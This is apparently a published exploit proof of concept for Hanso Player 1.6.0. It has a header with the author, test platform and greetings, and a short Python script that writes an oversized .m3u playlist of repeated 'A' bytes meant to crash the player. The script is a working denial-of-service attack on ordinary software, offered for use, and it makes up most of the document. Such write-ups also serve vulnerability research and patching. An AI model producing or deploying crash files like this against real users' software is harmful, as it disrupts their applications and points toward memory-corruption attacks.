|
# ########################################
# Exploit Title : Hanso Player 1.6.0 (.m3u) Denial of Service Vulnerability
# Software link : http://www.hansotools.com/applications/hanso-player.html
# Version : 1.6.0
# Tested on : Windows XP SP3 English
# Date : 2/07/2011
# Author : X-h4ck
# Website : http://www.pirate.al , # PirateAL Crew @2011
# Email : mem001@live.com
# Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta
# ########################################
#!/usr/bin/python
junk = "\x41" * 1111
f = open("crash.m3u",'w')
f.write(junk)
f.close()
print "Open it with Hanso Player, and the Application will Crash"
|